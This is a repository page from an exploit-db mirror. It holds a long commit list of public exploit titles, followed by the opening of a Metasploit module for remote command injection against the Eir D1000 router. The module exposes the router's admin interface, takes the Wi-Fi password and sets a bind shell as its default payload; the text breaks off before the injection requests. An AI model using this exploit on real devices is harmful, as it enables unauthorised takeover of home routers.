bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/linux_mips/remote/40740.rb
Offensive Security be57520c6f DB: 2016-12-21 
2 new exploits

FlashGet 1.9 - (FTP PWD Response) Remote Buffer Overflow (PoC)
FlashGet 1.9 - 'FTP PWD Response' Remote Buffer Overflow (PoC)

VMware Workstation - 'hcmon.sys 6.0.0.45731' Local Denial of Service
VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service

Flashget 3.x - IEHelper Remote Exec (PoC)
FlashGet 3.x - IEHelper Remote Exec (PoC)

Rosoft media player 4.4.4 - Buffer Overflow (SEH) (PoC)
Rosoft Media Player 4.4.4 - Buffer Overflow (SEH) (PoC)
Google Android -  WifiNative::setHotlist Stack Overflow
Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)
FlashGet 1.9.0.1012 - (FTP PWD Response) SEH STACK Overflow
FlashGet 1.9.0.1012 - (FTP PWD Response) Buffer Overflow (SafeSEH)
FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH STACK Overflow
FlashGet 1.9.0.1012 - 'FTP PWD Response' Buffer Overflow (SafeSEH)

freeFTPd - Remote Authentication Bypass
freeFTPd 1.2.6 - Remote Authentication Bypass

freeFTPd 1.0.10 - 'PASS' SEH Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' SEH Buffer Overflow (Metasploit)

freeFTPd - 'PASS' Buffer Overflow (Metasploit)
freeFTPd 1.0.10 - 'PASS' Buffer Overflow (Metasploit)
AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion
iziContents RC6 - GLOBALS[] Remote Code Execution
AlberT-EasySite 1.0a5 - 'PSA_PATH' Parameter Remote File Inclusion
iziContents RC6 - Remote Code Execution

SunShop Shopping Cart 3.5 - 'abs_path' Remote File Inclusion
SunShop Shopping Cart 3.5 - 'abs_path' Parameter Remote File Inclusion

SunShop 4.0 RC 6 - 'Search' Blind SQL Injection
SunShop Shopping Cart 4.0 RC 6 - 'Search' Blind SQL Injection

izicontents rc6 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities
iziContents rc6 - Remote File Inclusion / Local File Inclusion
gelato CMS 0.95 - (img) Remote File Disclosure
dotCMS 1.6 - 'id' Multiple Local File Inclusion
ZeeJobsite 2.0 - (adid) SQL Injection
gelato CMS 0.95 - 'img' Parameter Remote File Disclosure
dotCMS 1.6 - 'id' Parameter Local File Inclusion
Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection

XNova 0.8 sp1 - (xnova_root_path) Remote File Inclusion
XNova 0.8 sp1 - 'xnova_root_path' Parameter Remote File Inclusion

PHPBasket - 'product.php pro_id' SQL Injection
PHPBasket - 'pro_id' Parameter SQL Injection
Ad Board - 'id' SQL Injection
SunShop 4.1.4 - 'id' SQL Injection
Banner Management Script - 'tr.php id' SQL Injection
Ad Board - 'id' Parameter SQL Injection
SunShop Shopping Cart 4.1.4 - 'id' Parameter SQL Injection
Banner Management Script - 'id' Parameter SQL Injection
phpBazar 2.0.2 - (adid) SQL Injection
webEdition CMS - (we_objectID) Blind SQL Injection
CustomCMS 4.0 - (CCMS) print.php SQL Injection
phpBazar 2.0.2 - 'adid' Parameter SQL Injection
webEdition CMS - 'we_objectID' Parameter Blind SQL Injection
CustomCMS 4.0 - 'print.php' SQL Injection

TinyCMS 1.1.2 - (templater.php) Local File Inclusion
TinyCMS 1.1.2 - 'templater.php' Local File Inclusion
onenews Beta 2 - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities
5 star review - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
onenews Beta 2 - Cross-Site Scripting / HTML Injection / SQL Injection
5 star review - Cross-Site Scripting / SQL Injection

Web Directory Script 2.0 - (name) SQL Injection
Web Directory Script 2.0 - 'name' Parameter SQL Injection

Crafty Syntax Live Help 2.14.6 - (department) SQL Injection
Crafty Syntax Live Help 2.14.6 - 'department' Parameter SQL Injection
k-rate - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
CMME 1.12 - (Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory) Multiple Vulnerabilities
Thickbox Gallery 2.0 - (Admins.php) Admin Data Disclosure
k-rate - SQL Injection / Cross-Site Scripting
CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory
Thickbox Gallery 2.0 - 'Admins.php' Admin Data Disclosure

phpMyRealty 1.0.9 - Multiple SQL Injections
PHPMyRealty 1.0.9 - Multiple SQL Injections
brim 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Web Directory Script 1.5.3 - (site) SQL Injection
Words tag script 1.2 - (word) SQL Injection
Brim 2.0.0 - SQL Injection / Cross-Site Scripting
Web Directory Script 1.5.3 - 'site' Parameter SQL Injection
Words tag script 1.2 - 'word' Parameter SQL Injection

WeBid 0.5.4 - (item.php id) SQL Injection
WeBid 0.5.4 - 'item.php' SQL Injection

ZeeJobsite 2.0 - Arbitrary File Upload
Zeeways ZeeJobsite 2.0 - Arbitrary File Upload

BandSite CMS 1.1.4 - (members.php memid) SQL Injection
BandSite CMS 1.1.4 - 'members.php' SQL Injection

Thickbox Gallery 2 - 'index.php ln' Local File Inclusion
Thickbox Gallery 2 - 'index.php' Local File Inclusion

Joomla! Component 'com_wmtpic' 1.0 - SQL Injection
Joomla! Component com_wmtpic 1.0 - SQL Injection
Joomla! Component 'com_redshop' 1.0 - Local File Inclusion
Joomla! Component 'com_redtwitter' 1.0 - Local File Inclusion
Joomla! Component redSHOP 1.0 - Local File Inclusion
Joomla! Component redTWITTER 1.0 - Local File Inclusion
Joomla! Component 'com_svmap' 1.1.1 - Local File Inclusion
Joomla! Component 'com_shoutbox' - Local File Inclusion
Joomla! Component SVMap 1.1.1 - Local File Inclusion
Joomla! Component Shoutbox Pro - Local File Inclusion

Joomla! Component 'com_sebercart' 1.0.0.12 - Local File Inclusion
Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion

Joomla! Component 'com_xobbix' 1.0 - 'prodid' Parameter SQL Injection
Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection

Joomla! Component 'com_vjdeo' 1.0 - Local File Inclusion
Joomla! Component VJDEO 1.0 - Local File Inclusion

Joomla! Component 'com_realtyna' 1.0.15 - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion

Joomla! Component 'com_powermail' 1.5.3 - Local File Inclusion
Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion

Joomla! Component 'com_properties' - 'aid' Parameter SQL Injection
Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection

Joomla! Component 'com_tweetla' - Local File Inclusion
Joomla! Component TweetLA 1.0.1 - Local File Inclusion
Joomla! Component 'com_preventive' - Local File Inclusion
Joomla! Component 'com_rokmodule' - 'moduleid' Parameter Blind SQL Injection
Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection

Joomla! Component 'com_travelbook' 1.0.1 - Local File Inclusion
Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion

Joomla! Component 'com_webtv' - Local File Inclusion
Joomla! Component Web TV 1.0 - Local File Inclusion

Joomla! Component 'com_onlineexam' - Local File Inclusion
Joomla! Component Online Exam 1.5.0 - Local File Inclusion

Joomla! Component 'com_sweetykeeper' - Local File Inclusion
Joomla! Component Sweetykeeper 1.5 - Local File Inclusion

Joomla! Component 'com_sermonspeaker' - SQL Injection
Joomla! Component SermonSpeaker - SQL Injection

Joomla! Component 'com_QPersonel' - SQL Injection
Joomla! Component QPersonel 1.0.2 - SQL Injection

Joomla! Component 'com_photobattle' - Local File Inclusion
Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
Joomla! Component 'com_zimbcomment' - Local File Inclusion
Joomla! Component 'com_zimbcore' - Local File Inclusion
Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
Joomla! Component ZiMBCore 0.1 - Local File Inclusion
Joomla! Component 'com_wmi' - Local File Inclusion
Joomla! Component 'com_orgchart' - Local File Inclusion
Joomla! Component WMI 1.5.0 - Local File Inclusion
Joomla! Component OrgChart 1.0.0 - Local File Inclusion

Joomla! Component 'com_ultimateportfolio' - Local File Inclusion
Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion

Joomla! Component 'com_smartsite' - Local File Inclusion
Joomla! Component SmartSite 1.0.0 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Inclusion
Joomla! Component simpledownload 0.9.5 - Local File Inclusion

Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure
Joomla! Component simpledownload 0.9.5 - Local File Disclosure

Wordpress Plugin TinyBrowser - Arbitrary File Upload
WordPress Plugin TinyBrowser - Arbitrary File Upload

Joomla! Component 'com_qpersonel' 1.0 - SQL Injection
Joomla! Component Q-Personel 1.0 - SQL Injection

Joomla! Component 'com_searchlog' - SQL Injection
Joomla! Component Search Log 3.1.0 - SQL Injection

Joomla! Component 'com_oziogallery' 2 - Multiple Vulnerabilities
Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities

Joomla! Component 'com_picasa2gallery' - Local File Inclusion
Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion

Joomla! Component 'jeeventcalendar' - SQL Injection
Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection

Joomla! Component 'com_realtyna' - Local File Inclusion
Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
Joomla! Component 'jesubmit' - SQL Injection
Joomla! Component 'com_sef' - Remote File Inclusion
Joomla! Component jesubmit 1.4 - SQL Injection
Joomla! Component com_sef - Remote File Inclusion

Joomla! Component 'jesectionfinder' - Local File Inclusion
Joomla! Component jesectionfinder - Local File Inclusion

Joomla! Component 'Joomanager' - SQL Injection
Joomla! Component Joomanager - SQL Injection

Joomla! Component 'com_socialads' - Persistent Cross-Site Scripting
Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting
Joomla! Component 'com_redshop' 1.0 - 'pid' Parameter SQL Injection
Joomla! Component 'com_quickfaq' - Blind SQL Injection
Joomla! Component redSHOP 1.0 - 'pid' Parameter SQL Injection
Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection

Joomla! Component 'com_redshop' 1.0.23.1 - Blind SQL Injection
Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection

Joomla! Component 'com_staticxt' - SQL Injection
Joomla! Component StaticXT - SQL Injection

Joomla! Component 'com_oziogallery' - SQL Injection
Joomla! Component Ozio Gallery - SQL Injection

Joomla! Component 'com_youtube' - SQL Injection
Joomla! Component YouTube 1.5 - SQL Injection

Joomla! Component 'com_ttvideo' 1.0 - SQL Injection
Joomla! Component TTVideo 1.0 - SQL Injection

Joomla! Component 'com_teams' - Multiple Blind SQL Injection
Joomla! Component Teams - Multiple Blind SQL Injection

Joomla! Component 'com_picsell' - Local File Disclosure
Joomla! Component PicSell 1.0 - Local File Disclosure

Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities
Joomla! Component Restaurant Guide 1.0.0 - Multiple Vulnerabilities

Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection
Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection

Joomla! Component 'com_sponsorwall' - SQL Injection
Joomla! Component Sponsor Wall 1.1 - SQL Injection

Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion
Joomla! Component ProDesk 1.5 - Local File Inclusion

Joomla! Component 'mdigg' - SQL Injection
Joomla! Component mDigg 2.2.8 - SQL Injection

phpMyRealty 1.0.7 - SQL Injection
PHPMyRealty 1.0.7 - SQL Injection

Joomla! Component 'com_timereturns' 2.0 - SQL Injection
Joomla! Component Time Returns 2.0 - SQL Injection

Joomla! Component 'com_techfolio' 1.0 - SQL Injection
Joomla! Component Techfolio 1.0 - SQL Injection

Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities
Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities

BRIM < 2.0.0 - SQL Injection
Brim < 2.0.0 - SQL Injection

Joomla! Component 'com_rokmodule' - 'module' Parameter Blind SQL Injection
Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection

Wordpress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting
WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting

webid 1.0.5 - Directory Traversal
weBid 1.0.5 - Directory Traversal

Wordpress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload
WordPress Theme Clockstone (and other CMSMasters Themes) - Arbitrary File Upload

Webid 1.0.6 - Multiple Vulnerabilities
WeBid 1.0.6 - Multiple Vulnerabilities
MyBulletinBoard RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard RC4 - 'action' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'Username' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'polloptions' Parameter SQL Injection
MyBulletinBoard (MyBB) RC4 - 'action' Parameter SQL Injection

MyBulletinBoard 1.0 - Multiple SQL Injections
MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections

MyBulletinBoard 1.0 - 'RateThread.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection

MyBulletinBoard 1.0 - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0 - 'usercp.php' SQL Injection

Joomla! Component 'com_redshop' 1.2 - SQL Injection
Joomla! Component redSHOP 1.2 - SQL Injection

MyBulletinBoard 1.0.x/1.1.x - 'usercp.php' SQL Injection
MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection

MyBulletinBoard 1.x - 'usercp.php' Directory Traversal
MyBulletinBoard (MyBB) 1.x - 'usercp.php' Directory Traversal
Grayscale BandSite CMS 1.1 - help_news.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_merch.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - help_mp3.php max_file_size_purdy Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - sendemail.php message_text Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - login_header.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - bio_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - gbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - interview_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - links_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - lyrics_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - member_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - merch_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - mp3_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - news_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - pastshows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - photo_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - releases_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - reviews_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - shows_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - signgbook_content.php the_band Parameter Cross-Site Scripting
Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting
BandSite CMS 1.1 - 'help_news.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_merch.php' Cross-Site Scripting
BandSite CMS 1.1 - 'help_mp3.php' Cross-Site Scripting
BandSite CMS 1.1 - 'sendemail.php' Cross-Site Scripting
BandSite CMS 1.1 - 'header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'login_header.php' Cross-Site Scripting
BandSite CMS 1.1 - 'bio_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'gbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'interview_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'links_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'lyrics_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'member_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'merch_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'mp3_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'news_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'pastshows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'photo_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'releases_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'reviews_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'shows_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'signgbook_content.php' Cross-Site Scripting
BandSite CMS 1.1 - 'footer.php' Cross-Site Scripting

Wordpress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting
WordPress Plugin Quick Paypal Payments 3.0 - Presistant Cross-Site Scripting

Active PHP BookMarks 1.1.2 - APB_SETTINGS['apb_path' ] Multiple Remote File Inclusion
Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion

Wordpress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting
WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting

TurnkeyWebTools Sunshop 3.5/4.0 - Multiple Remote File Inclusion
SunShop Shopping Cart 3.5/4.0 - Multiple Remote File Inclusion

Active PHP BookMarks 1.0 - APB.php Remote File Inclusion
Active PHP BookMarks 1.0 - 'APB.php' Remote File Inclusion
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
TurnkeyWebTools SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting
SunShop Shopping Cart 4.0 - 'index.php' Multiple Parameter SQL Injection
SunShop Shopping Cart 4.0 - 'index.php' l Parameter Cross-Site Scripting

Wordpress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery
WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery

DMCMS 0.7 - 'index.php' SQL Injection
deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection
EasySite 2.0 - browser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - image_editor.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion
EasySite 2.0 - 'browser.php' Remote File Inclusion
EasySite 2.0 - 'image_editor.php' Remote File Inclusion
EasySite 2.0 - 'skin_chooser.php' Remote File Inclusion

MatterDaddy Market 1.1 - 'admin/login.php' Cross-Site Scripting
MatterDaddy Market 1.1 - 'login.php' Cross-Site Scripting

Wordpress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
WordPress Plugin TYPO3 - 't3m_cumulus_tagcloud' Extension 1.0 - HTML Injection / Cross-Site Scripting
Joomla! Component 'com_perchaimageattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchafieldsattach' 1.0 - 'index.php' Controller Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchadownloadsattach' 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component 'com_perchagallery' 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Image Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Fields Attach 1.0 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Downloads Attach 1.1 - 'Controller' Parameter Traversal Arbitrary File Access
Joomla! Component Percha Gallery 1.6 Beta - 'Controller' Parameter Traversal Arbitrary File Access

Joomla! Component 'com_perchacategoriestree' 0.6 - 'Controller' Parameter Arbitrary File Access
Joomla! Component Percha Multicategory Article 0.6 - 'Controller' Parameter Arbitrary File Access

Joomla! Component 'com_youtubegallery' - SQL Injection
Joomla! Component Youtube Gallery 4.1.7 - SQL Injection

Wordpress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Firestats 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'FreiChat' 1.0/2.x - Unspecified HTML Injection
Joomla! Component FreiChat 1.0/2.x - Unspecified HTML Injection

Wordpress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin WooCommerce Store Exporter 1.7.5 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection
Joomla! Component Weblinks - 'Itemid' Parameter SQL Injection

Wordpress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload
WordPress Plugin Creative Contact Form 0.9.7 - Arbitrary File Upload

Wordpress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting
WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Parameter Cross-Site Scripting

Wordpress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal
WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal

Wordpress Plugin DukaPress 2.5.2 - Directory Traversal
WordPress Plugin DukaPress 2.5.2 - Directory Traversal

Wordpress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection
WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection

Wordpress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting
WordPress Plugin WonderPlugin Audio Player 2.0 - Blind SQL Injection / Cross-Site Scripting

Wordpress Plugin Duplicator 0.5.8 - Privilege Escalation
WordPress Plugin Duplicator 0.5.8 - Privilege Escalation

Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection
WordPress Plugin Single Personal Message 1.0.3 - SQL Injection

Joomla! Component 'com_sanpham' - Multiple SQL Injections
Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections

Wordpress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload
WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload

Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting
Joomla! Component Currency Converter 1.0.0 - 'from' Parameter Cross-Site Scripting

Wordpress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting
WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting

Wordpress Plugin Paypal Currency Converter Basic For WooCommerce - File Read
WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read

Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection
Joomla! Component CCNewsLetter 1.0.7 - 'id' Parameter SQL Injection

Wordpress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection
WordPress Plugin Simple Photo Gallery 1.7.8 - Blind SQL Injection

Wordpress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
WordPress Plugin 2 Click Social Media Buttons 0.32.2 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting
Wordpress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin Media Library Categories - Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin LeagueManager 3.7 - Multiple Cross-Site Scripting Vulnerabilities
Wordpress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
Wordpress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin GD Star Rating 1.9.16 - 'tpl_section' Parameter Cross-Site Scripting
WordPress Plugin ]Mingle Forum 1.0.33 - 'admin.php' Multiple Cross-Site Scripting Vulnerabilities

Wordpress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting
WordPress Plugin Share and Follow 1.80.3 - 'admin.php' Cross-Site Scripting

Wordpress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities
Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections
Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Joomla! Component Realtyna RPL 8.9.2 - Multiple SQL Injections
Joomla! Component Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

Wordpress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting
WordPress Plugin Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting

Wordpress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities
WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection
Joomla! Component Sexy polling 1.0.8 - 'answer_id' Parameter SQL Injection

Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload
Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload

Wordpress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection
WordPress Plugin Simple Ads Manager 2.9.4.116 - SQL Injection

Wordpress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting
WordPress Plugin Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting

Wordpress Plugin Job Script by Scubez - Remote Code Execution
WordPress Plugin Job Script by Scubez - Remote Code Execution

Wordpress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite
Wordpress Plugin Answer My Question 1.3 - SQL Injection
Wordpress Plugin Sirv 1.3.1 - SQL Injection
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
WordPress Plugin Answer My Question 1.3 - SQL Injection
WordPress Plugin Sirv 1.3.1 - SQL Injection
WordPress Plugin BBS e-Franchise 1.1.1 - SQL Injection
WordPress Plugin Product Catalog 8 1.2.0 - SQL Injection

Wordpress Plugin Olimometer 2.56 - SQL Injection
WordPress Plugin Olimometer 2.56 - SQL Injection

Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion
WordPress Plugin WP Vault 0.8.6.6 - Local File Inclusion
Wordpress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
Wordpress Plugin WP Private Messages 1.0.1 - SQL Injection
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection
WordPress Plugin WP Private Messages 1.0.1 - SQL Injection
2016-12-21 05:01:18 +00:00

170 lines
5.6 KiB
Ruby
Executable file
Raw Blame History

=begin
# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
# Website: https://devicereversing.wordpress.com
# Tested on Firmware version: 2.00(AADU.5)_20150909
# Type: Webapps
# Platform: Hardware
Description
===========
By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the default Wi-Fi password. This is easily obtained with another TR-064 command.
Proof of Concept
================
=end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Eir D1000 Modem CWMP Exploit POC',
'Description' => %q{
This exploit drops the firewall to allow access to the web administration interface on port 80 and
it also retrieves the wifi password. The default login password to the web interface is the default wifi
password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909.
},
'Author' =>
[
'Kenzo', # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 07 2016',
'Privileged' => true,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
],
'DefaultTarget' => 1
))
register_options(
[
Opt::RPORT(7547), # CWMP port
], self.class)
@data_cmd_template = "<?xml version=\"1.0\"?>"
